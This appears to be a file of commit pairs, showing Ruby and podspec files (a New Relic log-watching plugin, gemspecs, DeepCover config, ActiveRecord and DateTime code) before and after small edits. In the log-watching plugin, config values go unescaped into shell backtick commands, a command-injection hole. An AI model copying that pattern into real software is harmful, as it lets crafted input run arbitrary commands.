raise( "Please provide a path to the log file." )
end
`test -e #{log_path}`
unless $?.success?
raise("Could not find the log file. The log file could not be found at: #{log_path}. Please ensure the full path is correct.")
end
@term = term.to_s.strip
if term.empty?
raise( "The term cannot be empty" )
end
end
end
NewRelic::Plugin::Setup.install_agent :logwatcher, LogwatcherAgent
#
# Launch the agent (never returns)
#
NewRelic::Plugin::Run.setup_and_run
end
Description for logwatcher_agent
#!/usr/bin/env ruby
# Monitors a given log file, reporting the rate of occurrences of a provided term. It’s the perfect plugin for error tracking.
#
# Compatibility
# -------------
# Requires the tail, grep, and wc commands.
require "rubygems"
require "bundler/setup"
require "newrelic_plugin"
#
#
# NOTE: Please add the following lines to your Gemfile:
# gem "newrelic_plugin", git: "git@github.com:newrelic-platform/newrelic_plugin.git"
#
#
# Note: You must have a config/newrelic_plugin.yml file that
# contains the following information in order to use
# this Gem:
#
# newrelic:
# # Update with your New Relic account license key:
# license_key: 'put_your_license_key_here'
# # Set to '1' for verbose output, remove for normal output.
# # All output goes to stdout/stderr.
# verbose: 1
# agents:
# logwatcher:
# # Full path to the the log file
# log_path: tmp.log
# # Returns the number of matches for this term. Use Linux Regex formatting.
# # Default: "[Ee]rror"
# term: "[Ee]rror"
# # Provide any options to pass to grep when running.
# # For example, to count non-matching lines, enter 'v'.
# # Use the abbreviated format ('v' and not 'invert-match').
# grep_options:
#
#
module NewRelic::Processor
class DiffRate<NewRelic::Plugin::Processor::Base
def initialize
super :diff_rate,"DiffRate"
end
def process val
val=val.to_f
ret=nil
curr_time=Time.now
if @last_time and curr_time>@last_time
ret=val/(curr_time-@last_time).to_f
end
@last_value=val
@last_time=curr_time
ret
end
end
end
module LogwatcherAgent
class Agent < NewRelic::Plugin::Agent::Base
agent_guid "DROP_GUID_FROM_PLUGIN_HERE"
agent_config_options :log_path, :term, :grep_options
agent_human_labels("Logwatcher") { "#{log_path}" }
def setup_metrics
@occurances=NewRelic::Processor::DiffRate.new
end
def poll_cycle
check_params
@last_length ||= 0
current_length = `wc -c #{log_path}`.split(' ')[0].to_i
count = 0
# don't run it the first time
if (@last_length > 0 )
read_length = current_length - @last_length
# Check to see if this file was rotated. This occurs when the +current_length+ is less than
# the +last_run+. Don't return a count if this occured.
if read_length >= 0
# finds new content from +last_length+ to the end of the file, then just extracts from the recorded
# +read_length+. This ignores new lines that are added after finding the +current_length+. Those lines
# will be read on the next run.
count = `tail -c +#{@last_length+1} #{log_path} | head -c #{read_length} | grep "#{term}" -#{grep_options.to_s.gsub('-','')}c`.strip.to_f
end
end
report_metric("Matches/Total", "Occurances", @occurances.process(count)) if count
@last_length = current_length
end
private
def term
@term || "[Ee]rror"
end
def check_params
@log_path = log_path.to_s.strip
if log_path.empty?
raise( "Please provide a path to the log file." )
end
`test -e #{log_path}`
unless $?.success?
raise("Could not find the log file. The log file could not be found at: #{log_path}. Please ensure the full path is correct.")
end
@term = term.to_s.strip
if term.empty?
raise( "The term cannot be empty" )
end
end
end
NewRelic::Plugin::Setup.install_agent :logwatcher, LogwatcherAgent
#
# Launch the agent (never returns)
#
NewRelic::Plugin::Run.setup_and_run
end
|
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'ltsv_logger/version'
Gem::Specification.new do |spec|
spec.name = "ltsv_logger"
spec.version = LtsvLogger::VERSION
spec.authors = ["Yuya.Nishida."]
spec.email = ["yuya@j96.org"]
spec.description = %q{TODO: Write a gem description}
spec.summary = %q{TODO: Write a gem summary}
spec.homepage = ""
spec.license = "MIT"
spec.files = `git ls-files`.split($/)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.3"
spec.add_development_dependency "rake"
end
implement gem.
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "ltsv_logger"
Gem::Specification.new do |spec|
spec.name = "ltsv_logger"
spec.version = LtsvLogger::VERSION
spec.authors = ["Yuya.Nishida."]
spec.email = ["yuya@j96.org"]
spec.description = "A logger implementation for LTSV format"
spec.summary = "A logger implementation for LTSV format"
spec.homepage = "https://github.com/nishidayuya/ltsv_logger"
spec.license = "X11"
spec.files = `git ls-files`.split($/)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_dependency "ltsv", "~> 0.1.0"
spec.add_development_dependency "bundler", "~> 1.3"
spec.add_development_dependency "rake"
end
|
# frozen_string_literal: true
module DeepCover
class Config
NOT_SPECIFIED = Object.new
def initialize(notify = nil)
@notify = nil
@options = {}
set(**DEFAULTS)
@notify = notify
end
def to_hash
@options.dup
end
alias_method :to_h, :to_hash
def to_hash_for_serialize
hash = to_hash
# TODO: (Max) I don't like mixup of configs being partly on DeepCover and Config like that...
hash[:paths] = DeepCover.lookup_globs
hash[:output] = hash[:output] ? File.expand_path(hash[:output]) : hash[:output]
hash[:cache_directory] = File.expand_path(hash[:cache_directory])
hash
end
def load_hash_for_serialize(hash)
@options.merge!(hash)
hash.each_key { |option| @notify.config_changed(option) } if @notify
# This was already transformed, it should all be absolute paths / globs, avoid doing it for nothing by setting it right away
# TODO: (Max) I don't like mixup of configs being partly on DeepCover and Config like that...
DeepCover.instance_variable_set(:@lookup_globs, hash[:paths])
end
def ignore_uncovered(*keywords, &block)
if block
raise ArgumentError, "wrong number of arguments (given #{keywords.size}, expected 0..1)" if keywords.size > 1
keywords << Node.unique_filter if keywords.empty?
Node.create_filter(keywords.first, &block)
AttributeAccessors.define_accessor(FILTER_NAME[keywords.first])
end
unless keywords.empty?
keywords = check_uncovered(keywords)
set(keywords.to_h { |kind| [FILTER_NAME[kind], true] })
end
Config.options_to_ignored(**@options)
end
def detect_uncovered(*keywords)
raise ArgumentError, 'No block is accepted' if block_given?
unless keywords.empty?
keywords = check_uncovered(keywords)
set(keywords.to_h { |kind| [FILTER_NAME[kind], false] })
end
OPTIONALLY_COVERED - Config.options_to_ignored(**@options)
end
module AttributeAccessors
def self.define_accessor(attr)
define_method(attr) do |arg = NOT_SPECIFIED|
return @options[attr] if arg == NOT_SPECIFIED
change(attr, arg)
end
end
%i[paths tracker_global reporter output cache_directory allow_partial]
.concat(OPTIONALLY_COVERED.map { |filter| FILTER_NAME[filter] })
.each { |attr| define_accessor(attr) }
end
include AttributeAccessors
def paths(paths = NOT_SPECIFIED)
paths = Array(paths).dup unless paths == NOT_SPECIFIED
super
end
def cache_directory(cache_directory = NOT_SPECIFIED)
return File.expand_path(super) if cache_directory == NOT_SPECIFIED
super
end
def reset
DEFAULTS.each do |key, value|
change(key, value)
end
self
end
def [](opt)
public_send(opt)
end
def []=(opt, value)
public_send(opt, value)
end
def set(**options)
options.each do |key, value|
self[key] = value
end
self
end
def self.options_to_ignored(**options)
OPTIONALLY_COVERED
.select { |filter| options[FILTER_NAME[filter]] }
end
private
def check_uncovered(keywords)
keywords = keywords.first if keywords.size == 1 && keywords.first.is_a?(Array)
unknown = keywords - OPTIONALLY_COVERED
raise ArgumentError, "unknown options: #{unknown.join(', ')}" unless unknown.empty?
keywords
end
def change(option, value)
if @options[option] != value
@options[option] = value.freeze
@notify.config_changed(option) if @notify.respond_to? :config_changed
end
self
end
end
end
Pass as keyword parameters
# frozen_string_literal: true
module DeepCover
class Config
NOT_SPECIFIED = Object.new
def initialize(notify = nil)
@notify = nil
@options = {}
set(**DEFAULTS)
@notify = notify
end
def to_hash
@options.dup
end
alias_method :to_h, :to_hash
def to_hash_for_serialize
hash = to_hash
# TODO: (Max) I don't like mixup of configs being partly on DeepCover and Config like that...
hash[:paths] = DeepCover.lookup_globs
hash[:output] = hash[:output] ? File.expand_path(hash[:output]) : hash[:output]
hash[:cache_directory] = File.expand_path(hash[:cache_directory])
hash
end
def load_hash_for_serialize(hash)
@options.merge!(hash)
hash.each_key { |option| @notify.config_changed(option) } if @notify
# This was already transformed, it should all be absolute paths / globs, avoid doing it for nothing by setting it right away
# TODO: (Max) I don't like mixup of configs being partly on DeepCover and Config like that...
DeepCover.instance_variable_set(:@lookup_globs, hash[:paths])
end
def ignore_uncovered(*keywords, &block)
if block
raise ArgumentError, "wrong number of arguments (given #{keywords.size}, expected 0..1)" if keywords.size > 1
keywords << Node.unique_filter if keywords.empty?
Node.create_filter(keywords.first, &block)
AttributeAccessors.define_accessor(FILTER_NAME[keywords.first])
end
unless keywords.empty?
keywords = check_uncovered(keywords)
set(**keywords.to_h { |kind| [FILTER_NAME[kind], true] })
end
Config.options_to_ignored(**@options)
end
def detect_uncovered(*keywords)
raise ArgumentError, 'No block is accepted' if block_given?
unless keywords.empty?
keywords = check_uncovered(keywords)
set(keywords.to_h { |kind| [FILTER_NAME[kind], false] })
end
OPTIONALLY_COVERED - Config.options_to_ignored(**@options)
end
module AttributeAccessors
def self.define_accessor(attr)
define_method(attr) do |arg = NOT_SPECIFIED|
return @options[attr] if arg == NOT_SPECIFIED
change(attr, arg)
end
end
%i[paths tracker_global reporter output cache_directory allow_partial]
.concat(OPTIONALLY_COVERED.map { |filter| FILTER_NAME[filter] })
.each { |attr| define_accessor(attr) }
end
include AttributeAccessors
def paths(paths = NOT_SPECIFIED)
paths = Array(paths).dup unless paths == NOT_SPECIFIED
super
end
def cache_directory(cache_directory = NOT_SPECIFIED)
return File.expand_path(super) if cache_directory == NOT_SPECIFIED
super
end
def reset
DEFAULTS.each do |key, value|
change(key, value)
end
self
end
def [](opt)
public_send(opt)
end
def []=(opt, value)
public_send(opt, value)
end
def set(**options)
options.each do |key, value|
self[key] = value
end
self
end
def self.options_to_ignored(**options)
OPTIONALLY_COVERED
.select { |filter| options[FILTER_NAME[filter]] }
end
private
def check_uncovered(keywords)
keywords = keywords.first if keywords.size == 1 && keywords.first.is_a?(Array)
unknown = keywords - OPTIONALLY_COVERED
raise ArgumentError, "unknown options: #{unknown.join(', ')}" unless unknown.empty?
keywords
end
def change(option, value)
if @options[option] != value
@options[option] = value.freeze
@notify.config_changed(option) if @notify.respond_to? :config_changed
end
self
end
end
end
|
#
# Be sure to run `pod lib lint NAME.podspec' to ensure this is a
# valid spec and remove all comments before submitting the spec.
#
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = "expanding-tableview"
s.version = "0.1.0"
s.summary = "A short description of expanding-tableview."
s.description = <<-DESC
An optional longer description of expanding-tableview
* Markdown format.
* Don't worry about the indent, we strip it!
DESC
s.homepage = "http://EXAMPLE/NAME"
s.screenshots = "www.example.com/screenshots_1", "www.example.com/screenshots_2"
s.license = 'MIT'
s.author = { "Ike Ellis" => "isaac.c.ellis@gmail.com" }
s.source = { :git => "http://EXAMPLE/NAME.git", :tag => s.version.to_s }
s.social_media_url = 'https://twitter.com/EXAMPLE'
s.platform = :ios, '7.0'
s.ios.deployment_target = '7.0'
# s.osx.deployment_target = '10.7'
s.requires_arc = true
s.source_files = 'Classes'
s.resources = 'Assets/*.png'
s.ios.exclude_files = 'Classes/osx'
s.osx.exclude_files = 'Classes/ios'
# s.public_header_files = 'Classes/**/*.h'
# s.frameworks = 'SomeFramework', 'AnotherFramework'
# s.dependency 'JSONKit', '~> 1.4'
end
expanding-tableview.podspec
#
# Be sure to run `pod lib lint NAME.podspec' to ensure this is a
# valid spec and remove all comments before submitting the spec.
#
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = "expanding-tableview"
s.version = "0.1.0"
s.summary = "A short description of expanding-tableview."
s.description = <<-DESC
An optional longer description of expanding-tableview
* Markdown format.
* Don't worry about the indent, we strip it!
DESC
s.homepage = "http://EXAMPLE/NAME"
s.screenshots = "www.example.com/screenshots_1", "www.example.com/screenshots_2"
s.license = 'MIT'
s.author = { "Ike Ellis" => "isaac.c.ellis@gmail.com" }
s.source = { :git => "https://github.com/iellis/expanding-tableview.git" }
s.social_media_url = 'https://twitter.com/EXAMPLE'
s.platform = :ios, '7.0'
s.ios.deployment_target = '7.0'
# s.osx.deployment_target = '10.7'
s.requires_arc = true
s.source_files = 'Classes/**/*.{h,m}'
s.resources = 'Assets/*.png'
s.ios.exclude_files = 'Classes/osx'
s.osx.exclude_files = 'Classes/ios'
# s.public_header_files = 'Classes/**/*.h'
# s.frameworks = 'SomeFramework', 'AnotherFramework'
# s.dependency 'JSONKit', '~> 1.4'
end
|
module ActiveRecord
# = Active Record Has Many Association
module Associations
# This is the proxy that handles a has many association.
#
# If the association has a <tt>:through</tt> option further specialization
# is provided by its child HasManyThroughAssociation.
class HasManyAssociation < AssociationCollection #:nodoc:
def initialize(owner, reflection)
@finder_sql = nil
super
end
protected
def owner_quoted_id
if @reflection.options[:primary_key]
quote_value(@owner.send(@reflection.options[:primary_key]))
else
@owner.quoted_id
end
end
# Returns the number of records in this collection.
#
# If the association has a counter cache it gets that value. Otherwise
# it will attempt to do a count via SQL, bounded to <tt>:limit</tt> if
# there's one. Some configuration options like :group make it impossible
# to do an SQL count, in those cases the array count will be used.
#
# That does not depend on whether the collection has already been loaded
# or not. The +size+ method is the one that takes the loaded flag into
# account and delegates to +count_records+ if needed.
#
# If the collection is empty the target is set to an empty array and
# the loaded flag is set to true as well.
def count_records
count = if has_cached_counter?
@owner.send(:read_attribute, cached_counter_attribute_name)
elsif @reflection.options[:counter_sql]
@reflection.klass.count_by_sql(@counter_sql)
else
@reflection.klass.count(:conditions => @counter_sql, :include => @reflection.options[:include])
end
# If there's nothing in the database and @target has no new records
# we are certain the current target is an empty array. This is a
# documented side-effect of the method that may avoid an extra SELECT.
@target ||= [] and loaded if count == 0
if @reflection.options[:limit]
count = [ @reflection.options[:limit], count ].min
end
return count
end
def has_cached_counter?
@owner.attribute_present?(cached_counter_attribute_name)
end
def cached_counter_attribute_name
"#{@reflection.name}_count"
end
def insert_record(record, force = false, validate = true)
set_belongs_to_association_for(record)
force ? record.save! : record.save(:validate => validate)
end
# Deletes the records according to the <tt>:dependent</tt> option.
def delete_records(records)
case @reflection.options[:dependent]
when :destroy
records.each { |r| r.destroy }
when :delete_all
@reflection.klass.delete(records.map { |record| record.id })
else
relation = Arel::Table.new(@reflection.table_name)
relation.where(relation[@reflection.primary_key_name].eq(@owner.id).
and(Arel::Predicates::In.new(relation[@reflection.klass.primary_key], records.map { |r| r.id }))
).update(relation[@reflection.primary_key_name] => nil)
@owner.class.update_counters(@owner.id, cached_counter_attribute_name => -records.size) if has_cached_counter?
end
end
def target_obsolete?
false
end
def construct_sql
case
when @reflection.options[:finder_sql]
@finder_sql = interpolate_sql(@reflection.options[:finder_sql])
when @reflection.options[:as]
@finder_sql =
"#{@reflection.quoted_table_name}.#{@reflection.options[:as]}_id = #{owner_quoted_id} AND " +
"#{@reflection.quoted_table_name}.#{@reflection.options[:as]}_type = #{@owner.class.quote_value(@owner.class.base_class.name.to_s)}"
@finder_sql << " AND (#{conditions})" if conditions
else
@finder_sql = "#{@reflection.quoted_table_name}.#{@reflection.primary_key_name} = #{owner_quoted_id}"
@finder_sql << " AND (#{conditions})" if conditions
end
construct_counter_sql
end
def construct_scope
create_scoping = {}
set_belongs_to_association_for(create_scoping)
{
:find => { :conditions => @finder_sql,
:readonly => false,
:order => @reflection.options[:order],
:limit => @reflection.options[:limit],
:include => @reflection.options[:include]},
:create => create_scoping
}
end
def we_can_set_the_inverse_on_this?(record)
inverse = @reflection.inverse_of
return !inverse.nil?
end
end
end
end
removing references to arel constants
module ActiveRecord
# = Active Record Has Many Association
module Associations
# This is the proxy that handles a has many association.
#
# If the association has a <tt>:through</tt> option further specialization
# is provided by its child HasManyThroughAssociation.
class HasManyAssociation < AssociationCollection #:nodoc:
def initialize(owner, reflection)
@finder_sql = nil
super
end
protected
def owner_quoted_id
if @reflection.options[:primary_key]
quote_value(@owner.send(@reflection.options[:primary_key]))
else
@owner.quoted_id
end
end
# Returns the number of records in this collection.
#
# If the association has a counter cache it gets that value. Otherwise
# it will attempt to do a count via SQL, bounded to <tt>:limit</tt> if
# there's one. Some configuration options like :group make it impossible
# to do an SQL count, in those cases the array count will be used.
#
# That does not depend on whether the collection has already been loaded
# or not. The +size+ method is the one that takes the loaded flag into
# account and delegates to +count_records+ if needed.
#
# If the collection is empty the target is set to an empty array and
# the loaded flag is set to true as well.
def count_records
count = if has_cached_counter?
@owner.send(:read_attribute, cached_counter_attribute_name)
elsif @reflection.options[:counter_sql]
@reflection.klass.count_by_sql(@counter_sql)
else
@reflection.klass.count(:conditions => @counter_sql, :include => @reflection.options[:include])
end
# If there's nothing in the database and @target has no new records
# we are certain the current target is an empty array. This is a
# documented side-effect of the method that may avoid an extra SELECT.
@target ||= [] and loaded if count == 0
if @reflection.options[:limit]
count = [ @reflection.options[:limit], count ].min
end
return count
end
def has_cached_counter?
@owner.attribute_present?(cached_counter_attribute_name)
end
def cached_counter_attribute_name
"#{@reflection.name}_count"
end
def insert_record(record, force = false, validate = true)
set_belongs_to_association_for(record)
force ? record.save! : record.save(:validate => validate)
end
# Deletes the records according to the <tt>:dependent</tt> option.
def delete_records(records)
case @reflection.options[:dependent]
when :destroy
records.each { |r| r.destroy }
when :delete_all
@reflection.klass.delete(records.map { |record| record.id })
else
relation = Arel::Table.new(@reflection.table_name)
relation.where(relation[@reflection.primary_key_name].eq(@owner.id).
and(relation[@reflection.klass.primary_key].in(records.map { |r| r.id }))
).update(relation[@reflection.primary_key_name] => nil)
@owner.class.update_counters(@owner.id, cached_counter_attribute_name => -records.size) if has_cached_counter?
end
end
def target_obsolete?
false
end
def construct_sql
case
when @reflection.options[:finder_sql]
@finder_sql = interpolate_sql(@reflection.options[:finder_sql])
when @reflection.options[:as]
@finder_sql =
"#{@reflection.quoted_table_name}.#{@reflection.options[:as]}_id = #{owner_quoted_id} AND " +
"#{@reflection.quoted_table_name}.#{@reflection.options[:as]}_type = #{@owner.class.quote_value(@owner.class.base_class.name.to_s)}"
@finder_sql << " AND (#{conditions})" if conditions
else
@finder_sql = "#{@reflection.quoted_table_name}.#{@reflection.primary_key_name} = #{owner_quoted_id}"
@finder_sql << " AND (#{conditions})" if conditions
end
construct_counter_sql
end
def construct_scope
create_scoping = {}
set_belongs_to_association_for(create_scoping)
{
:find => { :conditions => @finder_sql,
:readonly => false,
:order => @reflection.options[:order],
:limit => @reflection.options[:limit],
:include => @reflection.options[:include]},
:create => create_scoping
}
end
def we_can_set_the_inverse_on_this?(record)
inverse = @reflection.inverse_of
return !inverse.nil?
end
end
end
end
|
require 'rational' unless RUBY_VERSION >= '1.9.2'
class DateTime
class << self
# DateTimes aren't aware of DST rules, so use a consistent non-DST offset when creating a DateTime with an offset in the local zone
def local_offset
::Time.local(2007).utc_offset.to_r / 86400
end
def current
::Time.zone_default ? ::Time.zone.now.to_datetime : ::Time.now.to_datetime
end
end
# Tells whether the DateTime object's datetime lies in the past
def past?
self < ::DateTime.current
end
# Tells whether the DateTime object's datetime lies in the future
def future?
self > ::DateTime.current
end
# Seconds since midnight: DateTime.now.seconds_since_midnight
def seconds_since_midnight
sec + (min * 60) + (hour * 3600)
end
# Returns a new DateTime where one or more of the elements have been changed according to the +options+ parameter. The time options
# (hour, minute, sec) reset cascadingly, so if only the hour is passed, then minute and sec is set to 0. If the hour and
# minute is passed, then sec is set to 0.
def change(options)
::DateTime.civil(
options[:year] || year,
options[:month] || month,
options[:day] || day,
options[:hour] || hour,
options[:min] || (options[:hour] ? 0 : min),
options[:sec] || ((options[:hour] || options[:min]) ? 0 : sec),
options[:offset] || offset,
options[:start] || start
)
end
# Uses Date to provide precise Time calculations for years, months, and days.
# The +options+ parameter takes a hash with any of these keys: <tt>:years</tt>,
# <tt>:months</tt>, <tt>:weeks</tt>, <tt>:days</tt>, <tt>:hours</tt>,
# <tt>:minutes</tt>, <tt>:seconds</tt>.
def advance(options)
d = to_date.advance(options)
datetime_advanced_by_date = change(:year => d.year, :month => d.month, :day => d.day)
seconds_to_advance = (options[:seconds] || 0) + (options[:minutes] || 0) * 60 + (options[:hours] || 0) * 3600
seconds_to_advance == 0 ? datetime_advanced_by_date : datetime_advanced_by_date.since(seconds_to_advance)
end
# Returns a new DateTime representing the time a number of seconds ago
# Do not use this method in combination with x.months, use months_ago instead!
def ago(seconds)
since(-seconds)
end
# Returns a new DateTime representing the time a number of seconds since the instance time
# Do not use this method in combination with x.months, use months_since instead!
def since(seconds)
self + Rational(seconds.round, 86400)
end
alias :in :since
# Returns a new DateTime representing the start of the day (0:00)
def beginning_of_day
change(:hour => 0)
end
alias :midnight :beginning_of_day
alias :at_midnight :beginning_of_day
alias :at_beginning_of_day :beginning_of_day
# Returns a new DateTime representing the end of the day (23:59:59)
def end_of_day
change(:hour => 23, :min => 59, :sec => 59)
end
# Adjusts DateTime to UTC by adding its offset value; offset is set to 0
#
# Example:
#
# DateTime.civil(2005, 2, 21, 10, 11, 12, Rational(-6, 24)) # => Mon, 21 Feb 2005 10:11:12 -0600
# DateTime.civil(2005, 2, 21, 10, 11, 12, Rational(-6, 24)).utc # => Mon, 21 Feb 2005 16:11:12 +0000
def utc
new_offset(0)
end
alias_method :getutc, :utc
# Returns true if offset == 0
def utc?
offset == 0
end
# Returns the offset value in seconds
def utc_offset
(offset * 86400).to_i
end
# Layers additional behavior on DateTime#<=> so that Time and ActiveSupport::TimeWithZone instances can be compared with a DateTime
def compare_with_coercion(other)
other = other.comparable_time if other.respond_to?(:comparable_time)
other = other.to_datetime unless other.acts_like?(:date)
compare_without_coercion(other)
end
alias_method :compare_without_coercion, :<=>
alias_method :<=>, :compare_with_coercion
end
date_time/calculations.rb needs active_support/core_ext/object/acts_like because it uses acts_like?
require 'rational' unless RUBY_VERSION >= '1.9.2'
require 'active_support/core_ext/object/acts_like'
class DateTime
class << self
# DateTimes aren't aware of DST rules, so use a consistent non-DST offset when creating a DateTime with an offset in the local zone
def local_offset
::Time.local(2007).utc_offset.to_r / 86400
end
def current
::Time.zone_default ? ::Time.zone.now.to_datetime : ::Time.now.to_datetime
end
end
# Tells whether the DateTime object's datetime lies in the past
def past?
self < ::DateTime.current
end
# Tells whether the DateTime object's datetime lies in the future
def future?
self > ::DateTime.current
end
# Seconds since midnight: DateTime.now.seconds_since_midnight
def seconds_since_midnight
sec + (min * 60) + (hour * 3600)
end
# Returns a new DateTime where one or more of the elements have been changed according to the +options+ parameter. The time options
# (hour, minute, sec) reset cascadingly, so if only the hour is passed, then minute and sec is set to 0. If the hour and
# minute is passed, then sec is set to 0.
def change(options)
::DateTime.civil(
options[:year] || year,
options[:month] || month,
options[:day] || day,
options[:hour] || hour,
options[:min] || (options[:hour] ? 0 : min),
options[:sec] || ((options[:hour] || options[:min]) ? 0 : sec),
options[:offset] || offset,
options[:start] || start
)
end
# Uses Date to provide precise Time calculations for years, months, and days.
# The +options+ parameter takes a hash with any of these keys: <tt>:years</tt>,
# <tt>:months</tt>, <tt>:weeks</tt>, <tt>:days</tt>, <tt>:hours</tt>,
# <tt>:minutes</tt>, <tt>:seconds</tt>.
def advance(options)
d = to_date.advance(options)
datetime_advanced_by_date = change(:year => d.year, :month => d.month, :day => d.day)
seconds_to_advance = (options[:seconds] || 0) + (options[:minutes] || 0) * 60 + (options[:hours] || 0) * 3600
seconds_to_advance == 0 ? datetime_advanced_by_date : datetime_advanced_by_date.since(seconds_to_advance)
end
# Returns a new DateTime representing the time a number of seconds ago
# Do not use this method in combination with x.months, use months_ago instead!
def ago(seconds)
since(-seconds)
end
# Returns a new DateTime representing the time a number of seconds since the instance time
# Do not use this method in combination with x.months, use months_since instead!
def since(seconds)
self + Rational(seconds.round, 86400)
end
alias :in :since
# Returns a new DateTime representing the start of the day (0:00)
def beginning_of_day
change(:hour => 0)
end
alias :midnight :beginning_of_day
alias :at_midnight :beginning_of_day
alias :at_beginning_of_day :beginning_of_day
# Returns a new DateTime representing the end of the day (23:59:59)
def end_of_day
change(:hour => 23, :min => 59, :sec => 59)
end
# Adjusts DateTime to UTC by adding its offset value; offset is set to 0
#
# Example:
#
# DateTime.civil(2005, 2, 21, 10, 11, 12, Rational(-6, 24)) # => Mon, 21 Feb 2005 10:11:12 -0600
# DateTime.civil(2005, 2, 21, 10, 11, 12, Rational(-6, 24)).utc # => Mon, 21 Feb 2005 16:11:12 +0000
def utc
new_offset(0)
end
alias_method :getutc, :utc
# Returns true if offset == 0
def utc?
offset == 0
end
# Returns the offset value in seconds
def utc_offset
(offset * 86400).to_i
end
# Layers additional behavior on DateTime#<=> so that Time and ActiveSupport::TimeWithZone instances can be compared with a DateTime
def compare_with_coercion(other)
other = other.comparable_time if other.respond_to?(:comparable_time)
other = other.to_datetime unless other.acts_like?(:date)
compare_without_coercion(other)
end
alias_method :compare_without_coercion, :<=>
alias_method :<=>, :compare_with_coercion
end
|
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'caseadilla/version'
Gem::Specification.new do |spec|
spec.name = "caseadilla"
spec.version = Caseadilla::VERSION
spec.authors = ["Xavier Bick"]
spec.email = ["fxb9500@gmail.com"]
spec.description = "Caseadilla is a CMS for Rails based on Casein and Comfortable Mexican Sofa. It is designed to allow you to easily fit the CMS to your app, not the other way around. By default, Caseadilla installs with Devise for authentication and Declarative Authorization, however it can be installed without either if you want to use an existing auth system."
spec.summary = "A powerful yet unobtrusive CMS and data management system for Rails."
spec.homepage = "http://www.xavierbick.com"
spec.license = "MIT"
spec.required_ruby_version = "2.0.0"
spec.files = `git ls-files`.split($/)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.3"
spec.add_development_dependency "rake", "> 0"
if spec.respond_to? :specification_version then
spec.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
spec.add_runtime_dependency(%q<will_paginate>, ["~> 3.0"])
spec.add_runtime_dependency(%q<devise>, ["~> 3.2"])
spec.add_runtime_dependency(%q<zeiv-declarative_authorization>, [">= 1.0.0.pre"])
spec.add_runtime_dependency(%q<scrypt>, ["~> 1.2"])
spec.add_runtime_dependency(%q<jquery-rails>, ["> 0"])
else
spec.add_dependency(%q<will_paginate>, ["~> 3.0"])
spec.add_dependency(%q<devise>, ["~> 3.2"])
spec.add_dependency(%q<zeiv-declarative_authorization>, [">= 1.0.0.pre"])
spec.add_dependency(%q<scrypt>, ["~> 1.2.1"])
spec.add_dependency(%q<jquery-rails>, ["> 0"])
end
else
spec.add_dependency(%q<will_paginate>, ["~> 3.0"])
spec.add_dependency(%q<devise>, ["~> 3.2"])
spec.add_dependency(%q<zeiv-declarative_authorization>, [">= 1.0.0.pre"])
spec.add_dependency(%q<scrypt>, ["~> 1.2"])
spec.add_dependency(%q<jquery-rails>, ["> 0"])
end
end
Change required ruby version to equal or greater than 2.0.0
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'caseadilla/version'
Gem::Specification.new do |spec|
spec.name = "caseadilla"
spec.version = Caseadilla::VERSION
spec.authors = ["Xavier Bick"]
spec.email = ["fxb9500@gmail.com"]
spec.description = "Caseadilla is a CMS for Rails based on Casein and Comfortable Mexican Sofa. It is designed to allow you to easily fit the CMS to your app, not the other way around. By default, Caseadilla installs with Devise for authentication and Declarative Authorization, however it can be installed without either if you want to use an existing auth system."
spec.summary = "A powerful yet unobtrusive CMS and data management system for Rails."
spec.homepage = "http://www.xavierbick.com"
spec.license = "MIT"
spec.required_ruby_version = "~> 2.0.0"
spec.files = `git ls-files`.split($/)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.3"
spec.add_development_dependency "rake", "> 0"
if spec.respond_to? :specification_version then
spec.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
spec.add_runtime_dependency(%q<will_paginate>, ["~> 3.0"])
spec.add_runtime_dependency(%q<devise>, ["~> 3.2"])
spec.add_runtime_dependency(%q<zeiv-declarative_authorization>, [">= 1.0.0.pre"])
spec.add_runtime_dependency(%q<scrypt>, ["~> 1.2"])
spec.add_runtime_dependency(%q<jquery-rails>, ["> 0"])
else
spec.add_dependency(%q<will_paginate>, ["~> 3.0"])
spec.add_dependency(%q<devise>, ["~> 3.2"])
spec.add_dependency(%q<zeiv-declarative_authorization>, [">= 1.0.0.pre"])
spec.add_dependency(%q<scrypt>, ["~> 1.2.1"])
spec.add_dependency(%q<jquery-rails>, ["> 0"])
end
else
spec.add_dependency(%q<will_paginate>, ["~> 3.0"])
spec.add_dependency(%q<devise>, ["~> 3.2"])
spec.add_dependency(%q<zeiv-declarative_authorization>, [">= 1.0.0.pre"])
spec.add_dependency(%q<scrypt>, ["~> 1.2"])
spec.add_dependency(%q<jquery-rails>, ["> 0"])
end
end
|
Pod::Spec.new do |s|
s.name = 'Treasure'
s.version = '0.1.2'
s.summary = 'A small set of tools for deserializing JSON API objects.'
s.description = <<-DESC
Treasure is a small set of tools on top of Lyft's Mapper library to convert objects according to the JSON API specification.
DESC
s.homepage = 'https://github.com/fishermenlabs/Treasure'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'kfweber' => 'kevinw@fishermenlabs.com' }
s.source = { :git => 'https://github.com/fishermenlabs/Treasure.git', :tag => s.version.to_s }
